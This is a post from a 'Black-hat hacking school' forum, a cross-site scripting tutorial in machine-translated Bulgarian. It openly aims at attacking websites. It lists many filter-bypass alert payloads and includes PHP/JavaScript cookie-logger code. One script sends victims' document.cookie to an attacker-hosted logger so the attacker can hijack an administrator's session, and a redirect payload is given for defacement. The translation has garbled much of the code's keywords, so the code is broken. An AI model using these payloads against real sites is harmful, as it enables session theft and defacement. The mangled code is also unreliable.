DIR Return Create A Forum - Home
---------------------------------------------------------
Black-hat hacking school
HTML https://13343424434.createaforum.com
---------------------------------------------------------
*****************************************************
DIR Return to: XSS
*****************************************************
#Post#: 3--------------------------------------------------
XSS Урок.
DIR By: black-hat
Date: August 31, 2013, 6:45 am
---------------------------------------------------------
[glow=red,2,300]Какво е
XSS?[/glow]
Съжалявам
за езикът.
XSS означава
Cross-Site Scripting-. Тя е
осноsно
атака,
която се
използва
за
изпълнение
на HTML и JavaScript в
интернет-страницата.
Тази атака
може да
стане чрез
подаване
на заявки
в текстови
кутий, или
дори в URL.
четене на
текста
като HTML, така
че той
изпълнява
скриптове,
вместо да
ги
показвате
в
обикновен
текст. С XSS
атака,
можеш да
откраднеш
бисквитки
от
уеб-администратор,
или дори
да
използвате
някои
социално-инженерство,
за да
манипулират
някой в
изтеглите
вирус,
който сте
създали.
Такива
като един
бот, или RAT,
може би
дори и
Key-дървар XSS
може да
бъде много
опасно, но
може да
бъде много
леко.
Повечето
от моите
атаки са
леки атаки
XSS, че може да
бъде
трудно да
се
използва
срещу един
уеб сайт.
Има много
начини да
използвате
XSS в своя
полза. Ще
назовем
само
няколко
примера.
Можете да
използвате
поле за
сигнали,
за да
рекламирате
себе си,
или
предупреждава
уеб-администратор,
че сте
открили
нарушаване
на
сигурността
включва XSS.
Можете
също така
да
настроите
Cookie-Stealer/Logger.
Всичко,
което може
да
направите
с HTML, може да
се
използва
срещу
сайта с
тази
атака. Аз
ще обясня
някои от
най-важните
термини,
свързани с
XSS.
XSS: Моята
първа
атака.
Сега, нека
да
започнем.
В този
раздел, ще
се
обяснява
как да се
използвате
XSS в своя
полза.
Също ще се
стартира
първият ни
удар с XSS, ако
знаете
основите
на XSS, можете
да
пропуснете
тази част,
защото се
съмнявам,
че ще
научат
нещо,
което не
знаят на
кратко,
все още.
Сега,
нашата
първа
стъпка е
очевидно
да се
намери
уязвимо
място.
Намирането
на сайта
уязвими
към XSS е
много
по-лесно
от
намирането
на сайта
уязвими
към SQLi.
Проблемът
е, че може
да отнеме
време, за
да се
определи
дали
сайтът е
много
уязвим. С SQLi,
може
просто да
добавите
малко ". Но в
XSS, трябва да
изпратите
(понякога)
многобройни
запитвания,
да
тествате
сайта за XSS.
Най-уязвимите
места ще
съдържа Search,
вход или
зона
регистър.
Почти
навсякъде,
което
съдържа
текст
кутия,
може да се
използва с
XSS. Въпреки
това,
много хора
забравят
този факт
и никога
не я
използват
в пълния
им
потенциал,
защото те
мислят, че
е
безполезно.
Можете да
използвате
XSS чрез
източник,
както и, Не
може
просто да
вземете
нито един
скрипт, и
редактиране.
Но
редакцията
на
"поставяне
на
показалеца"
скрипт,
определено
е
изключение.
Аз ще
разясняват
този метод
на XSS-късно,
за сега,
ние се
нуждаем от
цялостни
неща.
Както и да
е, нашият
сайт
трябва да
има някои
текстови
полета, за
да имд
вход. Аз
просто ще
бъда с
помощта на
лентата за
търсене.
<script> alert ("XSS") </script>
Този малък
скрипт, е HTML.
Тoj ще
направи
малко поп
съобщение,
казвайки "XSS".
Можете да
редактирате
тази част,
ако
искате.
Само не
редактирате
всякакви
други
части на
сценария.
Сложи това
в лентата
си за
търсене и
натиснете
въведете.
Сега,
макар и
малко
сигнал
кутия
показа, че
вие
успешно
атакувахте
сайта
уязвими за
XSS! Ако не
изскочи
прозорец,
че е добре,
защото
това
означава,
че на
сайта ни
отне доста
време да
се сложи
във
филтър. A
филтър, е
когато
търсите
нещо, а
след това
преминава
през мини
процес,
основно от
инспекцията.
Тя
проверява
за
всякакви
злонамерени
(опасни)
неща. В
този
случай, тя
ще
изглежда
за XSS.
Понякога,
тези
филтри са
много
слаби, и
може да
бъде
заобиколен
много
лесно,
други
времена,
те могат
да бъдат
доста
трудно да
се
заобиколят.
Има много
начини за
заобикаляне
на XSS филтър.
Първо, ние
трябва да
разберем
това,
което
филтърът
се
блокира. А
много от
времето,
тя е
блокиране
на
сигнала.
Ето един
пример на
този вид
филтър:
Така че,
нека да
опитате да
сложите в
най-известния,
BASIC заявка на
всички
времена.
Тя ще
блокират
кавички. Е,
как, по
дяволите,
ние се е
отразило
това? Е, за
щастие има
начин да
кодира
пълно
съобщение
:). Ние ще
използват
малко
функция,
наречена
"String.FromCharCode". Името
на това до
голяма
степен
обяснява
всичко.
Той
криптира
нашия
текст, в ASCII.
Пример за
това
криптиране,
ще бъде
подобен на
този:
String.fromCharCode(88,83,83)
Да, може да
бъде малко
объркващо,
но с
по-малко
да обясни,
и
тестване,
това е
съвсем
проста.
Ето какво
ни пълно
заявката
ще
изглежда
така:
<script>alert(String.fromCharCode(88,83,83))</script>
Вие не се
нуждаят от
цитати в
прост
въпрос
така. Така
че ви
позволява
сложи това
обратно в
лентата за
търсене, и
готово!
Той е
работил!
Имаме поле
за
сигнали,
казвайки "XSS"!
Ако все
още не се
получи
нито един
прозорец с
предупреждение,
опитайте
някои от
тези
заявки,
които
обичам да
използвам:
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
'><script>alert("XSS")</script>
'><script>alert(String.fromCharCode(88,83,83))</script>
<ScRIPt>aLeRT("XSS")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
"><ScRIPt>aLeRT("XSS")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
'><ScRIPt>aLeRT("XSS")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt>
</script><script>alert("XSS")</script>
</script><script>alert(String.fromCharCode(88,83,83))</script>
"/><script>alert("XSS")</script>
"/><script>alert(String.fromCharCode(88,83,83))</script>
'/><script>alert("XSS")</script>
'/><script>alert(String.fromCharCode(88,83,83))</script>
</SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83))
</SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
";alert("XSS");"
";alert(String.fromCharCode(88,83,83));"
';alert("XSS");'
';alert(String.fromCharCode(88,83,83));'
";alert("XSS")
";alert(String.fromCharCode(88,83,83))
';alert("XSS")
';alert(String.fromCharCode(88,83,83))
Да, аз
просто
пише
всички
тези
надолу, и
го взеха
по-дълго,
отколкото
би
трябвало,
но всички
те работят
по свой
начин,
така че се
опитват
колкото се
може
повече от
тях,
колкото
можете. Аз
бях
нападнат
някои
доста
големи
сайтове с
някои от
тези
запитвания.
I създам
собствена
заявки
понякога,
трябва да
създадете
някои
прекалено,
те може да
дойде
по-удобно
много.
XSS:
съвременните
методи
Сега, в
тази
секция ще
бъде
споделяне
на някои
начини за
използване
на XSS
злонамерено
срещу
сайта.
Сега,
имайте
предвид,
всички
злонамерени
атаки
изпрати до
система,
сайт или
сървър, е
незаконно
и те могат
да бъдат
преследвани
за тези
действия.
Така че
винаги
използвайте
защита,
ако не
планирате
да правите
нещо
злонамерен
към сайта.
Ако искате
да
направите
малко
предупреждение
поп кутия,
вие не
трябва да
се нуждаят
от Proxy / VPN.
Cookie Кражбата
/ Излизане
Сега,
бисквитка
кражба е
за
най-зловреден
което
можем да
направим с
непостоянни
XSS.
Бисквитката
крадец /
дървар, ще
влезете
бисквитките
на
потребителя,
който
достъп до
страницата
на даден
документ.
Най-лесният
начин да
направите
това, ще
бъде с три
стъпки
процес.
Първо,
трябва да
се
настроите
на сайта.
Лично аз
намирам
HTML http://www.000webhost.com/
най-доброто
за качване
на
зловреден
код,
програми,
или нещо
друго.
Така че
продължавайте
напред и
да се
регистрирате
тук.
Сега, след
като сте
създали
вашия
сайт,
отидете на
файловия
мениджър.
Създаване
на нов
файл.
Наречете
го "CookieLog.txt".
Оставете
празно
код. Сега,
да създаде
друг файл
след това,
наречени
"CookieLogger.php". В CookieLogger.php,
ние трябва
да
добавите
някакъв
код, така
че да
изпраща
бисквитки,
които ние
дневник, в
нашия Cookie Log.
Добави
този
кодекс, в
него
(Просто се
уверете,
името на
файла има. PHP,
защото в
противен
случай
няма да се
движат на PHP
код (което
е огромен
проблем)).
Кликнете,
за да
видите Spoiler Code
Спойлер
<? PHP / *
*
Създадена
на 16. Април. 2007
* Създаден
от Audun Larsen (audun@munio.no)
*
* Copyright 2006 Munio IT, Audun Larsen
*
* Този
софтуер е
ПРЕДОСТАВЕНА
ОТ АВТОРА ``
КАКЪВТО Е''
И изрично
или
мълчаливо
ГАРАНЦИИ,
*
ВКЛЮЧИТЕЛНО,
НО НЕ САМО,
ГАРАНЦИИ
ЗА ГОДНОСТ
* ЗА
ОПРЕДЕЛЕНА
ЦЕЛ. В
НИКАКЪВ
СЛУЧАЙ
самия
автор или
СЪТРУДНИЦИ
НЕ НОСЯТ
ОТГОВОРНОСТ
* За преки,
косвени,
случайни,
специални,
ПРИМЕРНИ
ИЛИ
ПОСЛЕДВАЩИ
ЩЕТИ
*
(ВКЛЮЧИТЕЛНО,
НО НЕ САМО,
ПОРЪЧКИ НА
РЕЗЕРВНИ
ЧАСТИ И
УСЛУГИ;
ЗАГУБИ НА
ИЗПОЛЗВАНЕ,
ДАННИ ИЛИ
ПЕЧАЛБИ;
* ИЛИ
ПРЕКЪСВАНЕ
НА
РАБОТАТА),
ПРИЧИНЕНИ
и на всеки
ТЕОРИЯ НА
ОТГОВОРНОСТ,
НЕЗАВИСИМО
ДАЛИ ПО
ДОГОВОР,
ОГРАНИЧЕНА
ОТГОВОРНОСТ,
* OR деликт
(включително
небрежност
ИЛИ ДРУГО),
ПРОИЗТИЧАЩИ
ОТ
ИЗПОЛЗВАНЕТО
НА ТОЗИ
СОФТУЕР,
* Дори ако
има
информация
за
възможността
от такива
щети.
* /
ако (strlen ($ _SERVER ['QUERY_STRING'])>
0) {
$ FP =
FОтваряне
на ("/ CookieLog.txt. ',' А ');
неуспешно
($ FP, urldecode ($ _SERVER ['QUERY_STRING']) "\ N".);
неуспешно
($ РП);
} {Друго
>
HTML VAR ownUrl = "http:// <PHP ехо $ _SERVER?
['HTTP_HOST'];?> <? PHP ехо $ _SERVER
['PHP_SELF'];?>";
/ / ==
/ /
Предварително
е кодирал
и URLDecode
функции
/ /
/ / Copyright Albion
изследвания
ООД 2002
/ / Http://www.albionresearch.com/
/ /
/ / Можете да
копирате
тези
функции
при
условие,
че
/ / (А) ви да
оставите
тази
авторски
права
непокътнати,
и
/ / (B), ако
използвате
тези
функции на
достъпна
за
обществеността
/ / Уеб сайт,
който
включва
кредитна
някъде на
уеб сайт
/ / С линк към
HTML http://www.albionresearch.com/
/ /
/ / Ако
установите,
или да
определи
всички
грешки,
моля да ни
уведомите
на albionresearch.com
/ /
/ / SpecialThanks до Neelesh
Тхакур за
това, че
първият,
който
/ /
Докладвате
за грешка
в URLDecode () - сега
фиксирани
02.19.2003.
/ / И
благодарение
на всеки
друг,
който е
предоставил
коментари
и
предложения.
/ / ==
функция
предварително
е кодирал (STR)
{
/ /
Бягството
Javascript и
функции unescape
не
съответстват
/ / С какви
браузъри
всъщност
правят ...
VAR SAFECHARS = "0123456789" + / /
Цифров
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" + / /
Азбучна
"ABCDEFGHIJKLMNOPQRSTUVWXYZ" +
"-_ ~ * '().!"; / / RFC2396
Маркирай
герои
VAR HEX = "0123456789ABCDEF";
VAR прав
текст = ул.;
VAR кодиран = "";
за (VAR I = 0; аз <plaintext.length,
аз + +) {
VAR СН = plaintext.charAt (I);
ако (CH == "") {
кодиран +
= "+"; / / X-WWW-urlencoded, а не 20%
} Иначе,
ако (SAFECHARS.indexOf (СН)! = -1)
{
кодиран +
= СН;
} {Друго
VAR charCode = ch.charCodeAt (0);
ако (charCode> 255) {
сигнал
("Unicode Character"
+ CH
+ "" Не може
да бъде
кодиран,
използвайки
стандартен
URL кодиране. \
N "+
"(URL
кодиране
поддържа
само
8-битови
символи.) \ N" +
"Интервал (+)
ще бъде
заместен." );
кодиран + = "+";
} {Друго
кодиран + = "%";
кодиран + = HEX.charAt
((charCode >> 4) и 0xF);
кодиран + = HEX.charAt
(charCode и 0xF);
}
}
} / / За
върне
кодиран;
};
бисквитка
=
предварително
е кодирал
(document.cookie);
HTML = '<img src="'+ownUrl+'?'+cookie+'"> ";
document.write (HTML);
<? PHP
}
>
Сега,
когато
имаме
нашия
скрипт Cookie Logger,
ние можем
да
изпратим
на дървар
бисквитка
доколкото
ни е
приятел,
на Web-Admin :). За да
направите
това, може
би трябва
да Тини на URL.
Или, ако
мога да
разбера
как да се
излъже URL,
който ще
работи
също.
На
миниатюрния
на URL адрес
HTML http://www.spam.com/
и съм
сложил в URL.
Но
задръжте
един, ние
трябва да
добавите
скрипт в XSS
уязвимостта
ни. Това е
скрипт,
който ще
започне да
ни Logging Cookie.
<script> document.location =
"
HTML http://www.host.com/mysite/CookieLogger.php?cookie
=" +
document.cookie; </
скрипта>
Така че,
просто
добавете
този
скрипт,
след като URL,
то малка, и
го
изпратете
на нашата
Web-Admin, сега
това може
да отнеме
известно
време, за
да Admin
всъщност
кликнете
върху нея.
Понякога, Admin
няма да
щракнете
върху
него, така
че ако го
отнема
твърде
много
време, че
просто
трябва да
се откажат
и да
намери
друг начин
да го
експлоатира.
След като
получите
бисквитка,
можете да
използвате
"Cookie Manager" Firefox Адон
за
манипулиране
и
редактиране
на
бисквитки,
за да
можете
отвличане
на
администраторите
сесия.
Намирам Cookie
Мениджър
много
полезно
приложение
за XSS, не
забравяйте
да го
изтеглите.
Обезобразяване
Обезобразяване
е един от
най-честите
неща,
които
хората
обичат да
правят,
когато
имат
достъп до
множество
опции
администратор.
Най-вече,
така че те
могат да
се
рекламират,
и просто
да
споделите
с
администратора
знаем, че
сигурността
им е било
нарушено.
Както и да
е,
обезобразяване
с XSS изисква
постоянни
XSS, може би на
полето за
коментари,
или нещо
такова.
Можете да
използвате
този
скрипт, за
да създаде
отново
директно
на вашия
заличавам
страница
(Вероятно
трябва да
го
пренасочи
към
заличавам
си със Pastehtml.com,
защото е
анонимно
качване.)
<script> window.location =
"
HTML http://www.pastehtml.com/YOURDEFACEHERE/";
</
скрипта>
XSS: OnMouseOver
Onmousover не е
много
използваема
уязвимост.
Но все пак,
той все
още се
смята XSS. An
уязвимост
поставяне
на
показалеца
ще
изглежда
нещо като
това:
поставяне
на
показалеца
= prompt1337
Ние можем
да се
възползват
от тази,
като я
редактирате
към:
поставяне
на
показалеца
= сигнал ("XSS")
Много
основния
уязвимост,
но става
все
по-забелязах,
и се
адаптират
в много
други
сайтове.
Повечето
сайтове ще
използва Adobe
Flash или CSS да се
направи
тези
видове
ефекти
сега.
XSS Filter
заобикаляйки
техники
Понякога
един прост
въпрос XSS
просто
няма да
свърши
работа.
Причината
вашата
заявка не
работи, е
така,
защото на
сайта има WAF
или Filter набор
на място. A
филтър ще
блокират
най-много XSS
и SQLi заявки е
възможно.
В този
случай си
имаме
работа с XSS.
Има много
начини за
заобикаляне
XSS филтри, но
аз ще
обясня
само
няколко.
Hex
Заобикаляйки
С
блокираните
герои
като>, <, и /, че
е доста
трудно да
се изпълни
XSS заявка. Не
се
притеснявай,
винаги има
решение :)
Можете да
промените
вашите
герои, в Hex. A Hex
на
определен
характер,
е в
основата
на
характера,
но в
различен
формат.
Това
трябва да
ви
помогне:
> =% 3в
<=% 3в
/ =% 2f
ASCII
Заобикаляйки
С ASCII
кодиране,
ние можем
да
използваме
характер ",
който е
блокиран
доста Това
е една от
най-често
срещаните
XSS Filter
заобикаля
на всички
времена A
скрипт,
който ще
трябва да
бъдат
криптирани,
ще
изглежда
така...:
<br
*****************************************************
Page 1 of 1